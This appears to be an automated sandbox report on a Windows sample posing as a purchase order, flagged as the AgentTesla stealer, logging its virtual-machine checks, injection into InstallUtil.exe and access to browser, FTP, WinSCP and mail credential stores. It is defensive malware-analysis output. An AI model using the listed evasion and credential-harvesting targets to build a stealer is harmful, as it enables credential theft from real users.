Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598276s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598170s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -597998s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -597404s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -597296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -597187s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598276	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598170	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597998	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597404	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597187	Jump to behavior

Source: InstallUtil.exe, 0000000B.00000002.1531285467.0000000005E50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllorMo
Source: Iujcy.exe, 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Iujcy.exe, 0000000A.00000002.1407153584.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: Iujcy.exe, 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1289616229.0000000000712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllndpo
Source: InstallUtil.exe, 00000008.00000002.1427373043.00000000051A3000.00000004.00000020.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1510237810.0000000000909000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 0000000E.00000002.2513071410.0000000006270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\Iujcy.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8C1008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10A4008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C09008	Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Queries volume information: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Queries volume information: C:\Users\user\AppData\Roaming\Iujcy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Queries volume information: C:\Users\user\AppData\Roaming\Iujcy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2503048867.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 8044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 5428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7216, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 8044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 5428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7216, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 13.2.Iujcy.exe.3910328.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Iujcy.exe.3ee4480.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Iujcy.exe.3910328.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Iujcy.exe.3ee4480.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2503048867.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
